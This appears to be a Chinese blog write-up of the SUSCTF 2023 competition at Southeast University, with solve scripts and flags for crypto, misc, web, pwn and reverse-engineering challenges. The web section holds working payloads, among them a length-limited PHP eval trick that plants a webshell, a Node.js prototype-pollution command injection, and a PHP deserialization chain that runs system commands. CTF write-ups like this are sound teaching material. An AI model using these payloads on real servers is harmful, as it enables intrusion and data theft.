首页 博客

# 东南大学 CTF 赛

[TOC]

# Crypto

# 简单 signin

题目如下所示:

from Crypto.Util.number import bytes_to_long, getPrime
from secret import flag
def pad(msg):
    return msg + b'\xff' * (128 - len(msg))
m = bytes_to_long(pad(flag))
e = 31531
p = 95431874379056800461403445259355958387935856539457670356425515125991917830328568828651972541785162951577004360304248342910123051926823651602627402589646024807536428315338522607471890339989927938359121629376992700732961416640785761545967337504840306704525353304962963873393034684793837634498279771086870629657
q = getPrime(1024)
n = p * q
c = pow(m, e, n)
print(f"n = {n}")
print(f"c = {c}")
'''
n = 9348930722233673602747870627922536632051931596830523021029470658344207945872450281637991502010865592065129583919444366705749206472328965457544194442473293260282452962070450562945560992589541332260234314736143038686897312913015783450737566433863829005429013314715550324440987242308148777081086560034599304327276652495664906244483122716702510872815412012108241078407548981547499209568327923277655224418476652760666165437469372395064298306123072763746852926480684491336990072974216874092110132242942354893729766833447395903884939906128031153138078686954738158738122774175286616882470456680443125446990462174128736465953
c = 2246036184444567567139073961602298811002867470924696340632417536051794476792542719198116728236389022205886961611385905721428355981777782491582241568750536095813788750549170634252878325493396177232015086791252718288335539964125540101137052418937458875590436560115053061583109071488227920631582248047316093668301944870541017960236149831753450428112948744535859225066815666438374524191008471870502946582680908206282283571535153495358730331708125759496753890033345593289838781343364514965520605445715679520747672054689364311522070297101994310182740630464848831706608828051625089849355043315933834771158390525688604165661
'''
原本以为这是一道普普通通的 "简单"  题,结果做着做着发现,e 和 phi 不互素,没有办法直接求出 d,去互联网上了解了一下,发现 e 和 q-1 互素,因为 gcd (e,q-1)=1,所以可以改成:


e    d1  mod  (q1)m=cd  mod  qe\;*\;d \equiv 1\; mod\; (q-1) \\
m = c^d\;mod\;q



代码如下:


from Crypto.Util.number import *
# from secret import flag
from pwn import *
import gmpy2
e = 31531
p = 95431874379056800461403445259355958387935856539457670356425515125991917830328568828651972541785162951577004360304248342910123051926823651602627402589646024807536428315338522607471890339989927938359121629376992700732961416640785761545967337504840306704525353304962963873393034684793837634498279771086870629657
n = 9348930722233673602747870627922536632051931596830523021029470658344207945872450281637991502010865592065129583919444366705749206472328965457544194442473293260282452962070450562945560992589541332260234314736143038686897312913015783450737566433863829005429013314715550324440987242308148777081086560034599304327276652495664906244483122716702510872815412012108241078407548981547499209568327923277655224418476652760666165437469372395064298306123072763746852926480684491336990072974216874092110132242942354893729766833447395903884939906128031153138078686954738158738122774175286616882470456680443125446990462174128736465953
q = n // p
c = 2246036184444567567139073961602298811002867470924696340632417536051794476792542719198116728236389022205886961611385905721428355981777782491582241568750536095813788750549170634252878325493396177232015086791252718288335539964125540101137052418937458875590436560115053061583109071488227920631582248047316093668301944870541017960236149831753450428112948744535859225066815666438374524191008471870502946582680908206282283571535153495358730331708125759496753890033345593289838781343364514965520605445715679520747672054689364311522070297101994310182740630464848831706608828051625089849355043315933834771158390525688604165661
phi = (p-1)*(q-1)
d = gmpy2.invert(e,q-1)
m = pow(c,d,q)
print(long_to_bytes(m))
'''
n = 9348930722233673602747870627922536632051931596830523021029470658344207945872450281637991502010865592065129583919444366705749206472328965457544194442473293260282452962070450562945560992589541332260234314736143038686897312913015783450737566433863829005429013314715550324440987242308148777081086560034599304327276652495664906244483122716702510872815412012108241078407548981547499209568327923277655224418476652760666165437469372395064298306123072763746852926480684491336990072974216874092110132242942354893729766833447395903884939906128031153138078686954738158738122774175286616882470456680443125446990462174128736465953
c = 2246036184444567567139073961602298811002867470924696340632417536051794476792542719198116728236389022205886961611385905721428355981777782491582241568750536095813788750549170634252878325493396177232015086791252718288335539964125540101137052418937458875590436560115053061583109071488227920631582248047316093668301944870541017960236149831753450428112948744535859225066815666438374524191008471870502946582680908206282283571535153495358730331708125759496753890033345593289838781343364514965520605445715679520747672054689364311522070297101994310182740630464848831706608828051625089849355043315933834771158390525688604165661
'''
运行后得到 flag:


image-20231016083300152


susctf{d25d84fb-ca13-4dba-9e90-4994f30bef7a}


# Vigenere


题目如下所示:


import re
from secret import flag, key
assert re.match(r"^susctf\{[0-9a-f]{8}-([0-9a-f]{4}-){3}[0-9a-f]{12}\}$", flag)
assert re.match(r"^[a-z]{10}$", key)
def encrypt(msg, key):
    key, msg = key.lower(), msg.lower()
    res = ""
    k_i = 0
    for i in range(len(msg)):
        if not msg[i].isalpha():
            res += msg[i]
            continue
        c = msg[i]
        k = key[k_i % len(key)]
        res += chr((ord(c) + ord(k) - 2 * ord('a')) % 26 + ord('a'))
        k_i += 1
    return res
print(encrypt(flag, key))
'''
ieplnp{bhtnr6m3-04bm-41w3-lg78-c040377ys146}
'''
image-20231013112128576


由上述代码可以得到以下密文 res 和明文 msg 之间的关系:


res=(msg+k2a)  mod  26+ares = ( msg + k - 2*a) \;mod\; 26 + a



那么就能推导出以下内容:


msg=26n+(resa)k+2a          (n为整数)k=26n+(resa)msg+2a          (n为整数)msg = 26 * n + (res - a ) - k + 2*a \;\;\;\;\; (n为整数) \\
k = 26 * n + (res - a ) - msg + 2*a \;\;\;\;\; (n为整数)



在加密规则中可以知道,密钥 key 为 10 位均为小写字母,msg 在加密时所有字符都处理为小写。加密过程中,字符如果不是字母就直接将其放入密文中不进行任何处理;如果是字母就将其与密钥 key 对应的位数(超过 10 就 mod10)进行相加,并减去 2*a,再对 26 取余,再加 a。已知密文为: ieplnp{bhtnr6m3-04bm-41w3-lg78-c040377ys146} ,明文应该是  susctf  为开头的,于是根据上述等式,可以得知 k 的前六位为  qkxjuk


剩下的四位不用求出,直接根据明文的字符都在  a~f  中可以对 k 进行穷举。最终得到唯一的 flag


代码如下所示:


import itertools
import re
import string
import random
# from secret import flag, key
# assert re.match(r"^susctf\{[0-9a-f]{8}-([0-9a-f]{4}-){3}[0-9a-f]{12}\}$", flag)
# assert re.match(r"^[a-z]{10}$", key)
def encrypt(msg, key):
    key, msg = key.lower(), msg.lower()
    res = ""
    k_i = 0
    for i in range(len(msg)):
        if not msg[i].isalpha():
            res += msg[i]
            continue
        c = msg[i]
        k = key[k_i % len(key)]
        res += chr((ord(c) + ord(k) - 2 * ord('a')) % 26 + ord('a'))
        k_i += 1
    return res
def decrypt(res, key):
    k_i = 6
    msg = ""
    for i in range(6,len(res)):
        if not res[i].isalpha():
            msg += res[i]
            continue
        m = res[i]
        k = key[k_i % len(key)]
        for n in range(-2, 2):
            msg_ = chr(26 * n + (ord(m) - ord('a')) - ord(k) + 2 * ord('a'))
            if ord('a') <= ord(msg_) <= ord('f'):
            # if msg_.islower():
                msg += msg_
        k_i += 1
    return msg
def getk(msg, res):
        k = ""
        for i in range(len(msg)):
            for n in range(-3,3):
                m = msg[i]
                r = res[i]
                k_ = chr(ord(r) - ord('a') + 26*n - ord(m) + 2 * ord('a'))
                if k_.islower():
                    k += k_
            print(k)
# print(encrypt(flag, key))
def generate_random_string(length):
    random_string = ''.join(random.choice(string.ascii_lowercase) for _ in range(length))
    return random_string
res = 'ieplnp{bhtnr6m3-04bm-41w3-lg78-c040377ys146}'
letters = 'abcdefghijklmnopqrstuvwxyz'
# 生成所有可能的 4 个字母组合
combinations = []
for letter1 in letters:
    for letter2 in letters:
        for letter3 in letters:
            for letter4 in letters:
                combination = letter1 + letter2 + letter3 + letter4
                combinations.append(combination)
for combo in combinations:
    key = "qkxjuk" + ''.join(combo)
    # print(key)
    if len(decrypt(res, key)) == 38:
        print(decrypt(res,key))
# msg = 'susctf'
# getk(msg, res)
# k = "qkxjuk"
'''
ieplnp{bhtnr6m3-04bm-41w3-lg78-c040377ys146}
'''
运行后得到如下结果:


image-20231016083557773


加上前面的 susctf 就可以得到正确的 flag:


susctf{afaab6c3-04ed-41c3-bf78-a040377ff146}


# ezMath


题目如下:求出满足下列式子的最小正整数解 abca,b,c


ab+c+ba+c+ca+b=10\frac{a}{b+c} +\frac{b}{a+c}+\frac{c}{a+b} =10



这一题感觉是纯粹的数学问题,在网上找到了相关解的答案如下所示:


image-20231014234349719


因而


a=221855981602380704196804518854316541759883857932028285581812549404634844243737502744011549757448453135493556098964216532950604590733853450272184987603430882682754171300742698179931849310347a=22185598160238070419680451885431654175988385793202828558181254940463484424373750274401154\\9757448453135493556098964216532950604590733853450272184987603430882682754171300742698179931849310347


b=269103113846520710198086599018316928810831097261381335767926880507079911347095440987749703663156874995907158014866846058485318408629957749519665987782327830143454337518378955846463785600977b=269103113846520710198086599018316928810831097261381335767926880507079911347095440987749703663\\156874995907158014866846058485318408629957749519665987782327830143454337518378955846463785600977


c=4862378745380642626737318101484977637219057323564658907686653339599714454790559130946320953938197181210525554039710122136086190642013402927952831079021210585653078786813279351784906397934209c=48623787453806426267373181014849776372190573235646589076866533395997144547905591309463209539\\38197181210525554039710122136086190642013402927952831079021210585653078786813279351784906397934209


在网页中输入以上内容后就可以得到 flag:


image-20231016090703648


susctf{480ffdaf-a6bf-4b70-abb0-3fd0f2c3aeae}


# MISC


# 百团大战改


题目如下所示:


image-20231016090935860


二维码扫描后得到如下结果


Unicode:


\u58eb\u4eba\u0020\u5927\u571f\u0020\u5927\u4eba\u0020\u4e2d\u53e3\u0020\u4e2d\u4eba\u0020\u4eba\u5de5\u0020\u592b\u7f8a\u0020\u4e2d\u7530\u0020\u592b\u592b\u0020\u4eba\u4eba\u0020\u4eba\u7531\u0020\u5929\u4eba\u0020\u4eba\u53e3\u0020\u4e2d\u4eba\u0020\u738b\u5927\u0020\u4e2d\u53e3\u0020\u592b\u5927



将上述 Unicode 转换为汉字:


士人 大土 大人 中口 中人 人工 夫羊 中田 夫夫 人人 人由 天人 人口 中人 王大 中口 夫大



一看就知道这是当铺密码,进行解码得到以下数字。


53 55 53 20 23 34 79 20 77 33 31 63 30 23 65 20 75



猜测以上数字为 ASCII 码的 16 进制数字,对其进行转换可以得到如下内容:


SUS #4y w31c0#e u



直接提交这个内容是不正确的,推测图片中隐藏有其他内容,对 png 文件使用 binwalk 进行检查,发现了隐藏的 zip 文件,但是需要密码。那上面的字符串进行尝试,发现密码正确,得到剩下的部分:


image-20231016091906862


_join us!


对所有内容进行拼接,得到 flag:


susctf{SUS #4y w31c0#e u_join us!}


# SUSTV


本题拿到音频后,发现最后一段的声音非常的不和谐,猜测这段声音中隐藏的有信息,在网上找到了解这种题目的方法,下载 SSTV 软件,使用虚拟声卡将音乐输入进去,可以得到一张二维码:


image-20231014145417282


扫码就可以拿到 flag  susctf{b7c55a86-56f4-4ebe-ba57-03d3cae609ea}


# Can_u_find_meeeeee?


题目为一个 eee 文件:


image-20231016092943497


扔进 010 中进行查看,发现开头为 50 4B 03 04:


image-20231016093108356


典型的 zip 文件,改后缀。里面文件很多,把查看隐藏文件打开,进行查找,可以找到一个隐藏的文件夹 sdsda ,其中含有一个隐藏文件  .me


image-20231014124907074


打开后是乱码,但是最下面有一段:


image-20231014124944686


提取出来为: susctf{S8KlL4/mSxg9efLxKsk5eiPJOf/rKlG9K4hXS8gmTfGtKxGk} ,直接提交发现不对,觉得应该是加密过的,拿到 cyberchef 里面 magic 一下得到正确的 flag


image-20231014125102495


susctf{066f072e-96fc-d9b4-01ca-b1a057513ba5}


# 算术!


题目:


image-20231014141431854


本题目根据 arithmetic coding 规则进行解码即可,过程如下:


IMG_2175


因而 flag 为: susctf{aloha}


# 旺旺的课程表


题目如下:


task


拿到图片检查一下长宽是否正确:


#使用 python [脚本文件名] [图片文件名]
import zlib
import struct
import sys
filename = sys.argv[1]
with open(filename, 'rb') as f:
    all_b = f.read()
    crc32key = int(all_b[29:33].hex(),16)
    data = bytearray(all_b[12:29])
    n = 4095
    for w in range(n):
        width = bytearray(struct.pack('>i', w))
        for h in range(n):
            height = bytearray(struct.pack('>i', h))
            for x in range(4):
                data[x+4] = width[x]
                data[x+8] = height[x]
            crc32result = zlib.crc32(data)
            if crc32result == crc32key:
                print("宽为:",end="")
                print(width)
                print("高为:",end="")
                print(height)
                exit(0)
image-20231014180520256


image-20231014180544950


长宽结果没有什么异常。使用 zsteg 也没有发现什么:


image-20231014181934718


pngcheck 也没有问题(如果某一块没有满但后面却还有 IDAT 块则说明后面的块是 “假” 的),但是都正常:


image-20231014182314299


进入 Stegsolve 中进行尝试,切换了一下视图,结果发现了 二维码:


image-20231014183019450


扫描二维码得到如下内容,维吉尼亚密码:


vigenere:T29tAGSCf2KaZAXeBkylQrsiw3MhR3PocagnRqWrEhX5JYS4PHVlRFGnHb04LFZlPKTlANV3HcSbKHVyEB0uCXpaboShCJTycQEtBETffB4=



题目对课表内容有所提示,猜测是夏多密码。根据如下所示过程可以得到序号所对应的  夏多密码


3001F020D723381FDA50CD419B8FDE52


所以 猜测  维吉尼亚密码的 KEY 为:


CYBERSECURITY



进行解密得到:


R29vZCBKb2IgISEgZmxhZzogc3VzY3RmezcwZmUxNzE5LWU4ODEtNDMwZi04NDBkLTBhYTE3ZjUzMGRhMX0sIGhhdmUgYSBuaWNlIGRheX4=



再使用 Base64:


image-20231014194422489


就可以拿到正确的 flag:


susctf{70fe1719-e881-430f-840d-0aa17f530da1}


# AI-keras.Model.summary()


题目如下:


image-20231016093708125


使用 010 打开 keras 文件进行查找:


image-20231015102445681


WelcomeLOLAndhereisyourflag have_fun_with_deep_conv_net


只需要提交带有连字符的部分,即:


have_fun_with_deep_conv_net


因而 flag 为:


susctf{have_fun_with_deep_conv_net}


# Do_u_know_Jeremiah_Denton?


题目如下:


image-20231016093806751


对音频文件进行了常规方法分析后,并没有什么发现,我也不知道 Jeremiah_Denton 是谁,还特意去瞅了瞅,这个人是越战期间用眼睛打摩斯电码的人。但是题目没有任何地方有类似摩斯电码的声音。查看题目提示: private搜索了一下发现了利用 private bit  隐藏信息的方法,于是把文件丢入 010 中进行查看:


image-20231015151251449


可以看出,第一个帧块的开始地址是  0x19C , 且当 padding 为 0 是,帧大小为  0x1A1 ,padding 为 1 时,帧大小为  0x1A2 ,private 位置是帧的第二字节的倒数第一位,padding 位置是帧的第二字节的倒数第二位。构建脚本获取所有帧所包含的 private 的值,并将其转为 ASCII:


import re
import binascii
n = 0x19C + 0x2  # 起始位置
result = ''
file = open('QueenCard.mp3', 'rb')
# 提取
while n < 0x27119C+0x1A1:  # 结束位置
    file.seek(n, 0)
    head = file.read(1)
    padding = '{:08b}'.format(ord(head))[-2]
    file.seek(n, 0)
    file_read_result = file.read(1)
    result += '{:08b}'.format(ord(file_read_result))[-1]
    n += 0x1A2 if padding == "1" else 0x1A1
# 拼接
flag = ''
textArr = re.findall('.{'+str(8)+'}', result)
for i in textArr:
    flag = flag + chr(int(i, 2)).strip('\n')
print(flag)
运行得到 flag:


image-20231016093926131


susctf{3fa723a9-92c1-17fc-8364-50457b1e95c6}


# 问卷调查


susctf{Th4nK_Y0u_F0R_Y0UR_Partic1pa71oN}


# web


# PHP Is All You Need


题目如下所示:


<?php
// Revenge of last year's signin challenge
// Now you can't use a webshell tool to connect :)
isset($_REQUEST['cmd']) && strlen($_REQUEST['cmd']) < 20 && eval($_REQUEST['cmd']);
highlight_file(__FILE__);
该题目对输入的字符数目有所限制,对于这类题目,经过互联网学习,有一种通用解法如下所示:


首先将需要写入的语句进行 Base64 编码,避免特殊字符:


image-20231013184410011


再构建需要执行的语句:


echo PD9waHAgZXZhbCgkX0dFVFsxXSk7|base64 -d>1.php



对于上述需要执行的语句,我们可以通过在目录中构建以字符为命名的文件,利用 ls -t>0  使其写入 0 文件,再利用 shell 执行文件 0,构建我们所需要的 1.php 文件:


>hp
>1.p\\
>d\>\\
>\ -\\
>e64\\
>bas\\
>7\|\\
>XSk\\
>Fsx\\
>dFV\\
>kX0\\
>bCg\\
>XZh\\
>AgZ\\
>waH\\
>PD9\\
>o\ \\
>ech\\
ls -t>0
sh 0



使用如下脚本进行攻击:


#!/usr/bin/python
# -*- coding: UTF-8 -*-
 
 
import requests
 
url = "http://game.ctf.seusus.com:38248/index.php?cmd=system('{0}');"
print("[+]start attack!!!")
with open("/mnt/e/ramDownload/payload.txt","r") as f:
  for i in f:
    print("[*]" + url.format(i.strip()))
    requests.get(url.format(i.strip()))
 
#检查是否攻击成功
test = requests.get("http://game.ctf.seusus.com:38248/index.php")
if test.status_code == requests.codes.ok:
  print("[*]Attack success!!!")
image-20231013195922046


利用 ls 查看当前的目录文件,可以发现,已经成功生成相关文件以及 1.php 。


image-20231013195744753


利用以下语句得到我们的文件,并查看到 flag:


1.php?1=system("cat f1ag_c7271.php");



image-20231013195653670


susctf{php is easy af0c79401aea}


# pollut me


node.js 污染


将源代码下载下来进行解读,发现里面已经有了一个用户 test,用 test 进行登录,并尝试修改自己的信息,利用修改信息调用 merge 可以触发原型链污染,代码中提示我们 flag 在 /flag 中,我们可以加入 __proto__ 属性 "eval_item",其值是 cat /flag,这样就会通过 if 判断,进行执行。


// 修改信息页面
app.get('/update-info', (req, res) => {
    res.sendFile(__dirname + '/public/update-info.html');
  });
  
  // 处理修改信息请求
  app.post('/update-info', require('body-parser').json(),(req, res) => {
    let username = req.body.username;
    let user = users.find(u => u.username === username);
    if (user) {
        merge(user,req.body);
      res.json({ message: '姓名更新成功' });
      console.log(users.find(u => u.username === username));
    } else {
      res.send('用户未找到。');
    }
  })
app.get("/eval",(req,res)=>{
let test={};
if(test.eval_item){
  //in one contains, you can do eval only once,now i tell you flag in /flag
  const { execSync } = require('child_process'); 
  res.send(execSync(test.eval_item).toString());
}
else{
  res.send("none");
}
});
image-20231013211711836


susctf{p0llut3_w3ll_78b535fd1d9b}


# why not play a game


本题直接打开源代码就可以发现 flag


image-20231014144424179


susctf{welcome_to_susctf_2023_ctf_is_so_fun}


# 转瞬即逝


提示如下:


即时间和密码的差值小于 5 时才可以通过验证


 <!-- maybe... int(time.time()) - int(password) < 5 -->



在线获取时间戳,并根据手速进行略微修正自己的密码,登陆后页面转瞬即逝,所以采用抓包进行查看,得到如下内容:


image-20231014200809419


显然是一个加密,直接丢入 cyberchef 进行 magic 即可


eyJhbGciOiJIUzI1NiJ9.eyJnaWZ0Ijoic3VzY3Rme1lvdXJfR2kxVF9PZl9NT01FbnRfNmY4ZTFiMTk0YjE2fSIsInVzZXJuYW1lIjoiYWRtaW4ifQ.OA-iCBGh33axSvXRCc0YBlQjxse_JIAENxn-qropZOM



image-20231014200934693


susctf{Your_Gi1T_Of_MOMEnt_6f8e1b194b16}


# sleep away


第一步 md5 绕过,只要是科学计数法即可:


http://game.ctf.seusus.com:40044/?step1=0e215962017



第二步构造反序列化 1.php:


<?php
class safeeval{
    public $evalstr = "system";
    public $args_down = "ls la /";
    function __destruct()
    {
        $evalstr=(string)$this->evalstr;
        $evalstr($this->args_down);
    }
    function __wakeup(){
        $this->args_down=[];
    }
}
class helper{
    public $youneed;
    public $truearg;
    public $thinkit;
    function __construct($you,$a,$think)
    {
        $this->thinkit=$think;
        $this->youneed=$you;
        $this->truearg=$a;
    }
    function __wakeup()
    {
        echo "wakeup";
        $this->youneed=$this->turearg;
    }
}
$test = new safeeval;
echo urldecode(serialize($test));
运行:


php -f 1.php   # ---> O:8:"safeeval":2:{s:7:"evalstr";s:6:"system";s:9:"args_down";s:7:"ls la /";}



http://game.ctf.seusus.com:24076/?step1=0e215962017&backdoor=O:8:"safeeval":2:{s:7:"evalstr";s:6:"system";s:9:"args_down";s:7:"ls la /";}



直接注入的话 args_down 会被 wake_up 函数直接置为空:


image-20231015104120912


如果更改 safeeval 元素超过 2 个的话则会没有任何反应。


image-20231015103956847


利用 class helper,进行构建,将 youneed 和 args_down 进行内存地址链接。使得 wake_up 时先执行 safeeval 的 wake_up,将 arg 置为空后,再执行 helper 的 wake_up,对 youneed 进行赋值,args_down 的值也会随之改变。


代码和结果如下:


<?php
class safeeval{
    public $evalstr = "system";
    public $args_down = "ls la /";
    function __destruct()
    {
        $evalstr=(string)$this->evalstr;
        $evalstr($this->args_down);
    }
    function __wakeup(){
        $this->args_down=[];
    }
}
class helper{
    public $youneed;
    public $turearg = "ls";
    public $thinkit;
    function __wakeup()
    {
        echo "wakeup";
        $this->youneed=$this->turearg;
    }
}
$test = new safeeval;
$he = new helper;
$he->youneed = &$test->args_down;
$he->thinkit = $test;
echo (serialize($he));
O:6:"helper":3:{s:7:"youneed";s:7:"ls la /";s:7:"turearg";s:2:"ls";s:7:"thinkit";O:8:"safeeval":2:{s:7:"evalstr";s:6:"system";s:9:"args_down";R:2;}}



http://game.ctf.seusus.com:24076/?step1=0e215962017&backdoor=O:6:"helper":3:{s:7:"youneed";s:7:"ls la /";s:7:"turearg";s:2:"ls";s:7:"thinkit";O:8:"safeeval":2:{s:7:"evalstr";s:6:"system";s:9:"args_down";R:2;}}



得到如下内容:


image-20231015113032096


image-20231015113133080


修改为 cat /f1agggg:


O:6:"helper":3:{s:7:"youneed";s:7:"ls la /";s:7:"turearg";s:12:"cat /f1agggg";s:7:"thinkit";O:8:"safeeval":2:{s:7:"evalstr";s:6:"system";s:9:"args_down";R:2;}}



image-20231015113217333


拿到 flag: susctf{R_1s_g00d_e1a2b8682df9}


# Pwn


# random


参考学习


异或操作一个数,再异或该数就可以得到它本身。


image-20231014202334171


image-20231014205053925


代码如下所示,先在本地得到一个随机数,将其与 -889275714 进行异或操作就可以得到 key 的值,随后利用该 key 链接远程环境进行攻击。


from pwn import *
from ctypes import *
dll = CDLL('libc.so.6')
# sh = process('/mnt/e/ramDownload/random')
sh = remote("game.ctf.seusus.com",36349)
dll.srand(1)
print(dll.rand())
r = 1804289383
v = -889275714
key = r ^ v
# print(key) #-1586102311
sh.recvuntil('mind?')
sh.sendline(str(-1586102311))
sh.interactive()
在远程环境下运行,得到 flag:


image-20231014204746771


susctf{ju57_p5euD0-raNDoM_8441355483d1}


# Re


# signin


掏出 DIE:


image-20231014205220789


好了,可以丢进 IDA 了:


image-20231014210556913


读进去的数进行一系列操作后和 unk_41F000 进行比较,我们只需要将这个一系列过程反过来进行执行,通过 unk_41F000 得到我们需要输入的数:


image-20231014210541108


代码如下:


unk_ = [0x6C,0x41,0x1,0x3,0x26,0x68,0x41,0X59,0X39,0X6A,0X42,0X4,0X26,0X6B,0X45,0X31,0X44,0X7,0X7,0X4C,0X68,0X2D,0X5F,0X6C,0X4,0X56,0X6E,0X2D,0X6A,0X49,0X5A,0X75]
for i in range (0,16,2):
    v6 = unk_[i]
    unk_[i] = unk_[i+16]
    unk_[i+16] = v6
for i in range(31,0,-1):
    unk_[i-1] ^= unk_[i]
print(unk_)
chars = [chr(num) for num in unk_]
result = ''.join(chars)
print(result)
运行结果如下:


image-20231014214422191


susctf{6r347_7h15_15_4n_345y_r3_f0r_y0u}


# babyPowerShell


题目如下所示:


('w'+("{0}{1}" -f 'yes','us')+'c'+'tf'+'{Pow'+("{1}{0}{2}" -f'shel','er','l')+'_'+'i'+("{0}{1}"-f'sss','s')+'ss'+("{2}{0}{1}" -f 's','sss_v','ss')+("{1}{2}{0}"-f '_ez_f','err','y')+'o'+'rrr'+'r'+'rr'+'r'+'r_you}'+("{1}{0}" -f 'zZRout','wye')+("{0}{1}"-f'-nul','l')).REPLAce('zZR',[StRing][CHAR]124).REPLAce(([CHAR]119+[CHAR]121+[CHAR]101),[StRing][CHAR]34)|.( $EnV:COMsPEC[4,26,25]-JoiN'')



该命令等价于:


image-20231015172532919


因此 flag 为: susctf{Powershell_issssssssssss_verry_ez_forrrrrrrr_you}


      

          
      

  


   


    

  
    
      
    
    更新于
    
  



      


  
  
请我喝[茶]~( ̄▽ ̄)~*

  

      
      

        Yanagi-Kon 微信支付
        
微信支付

      

      
      

        Yanagi-Kon 支付宝
        
支付宝

      

      
      

        Yanagi-Kon 贝宝
        
贝宝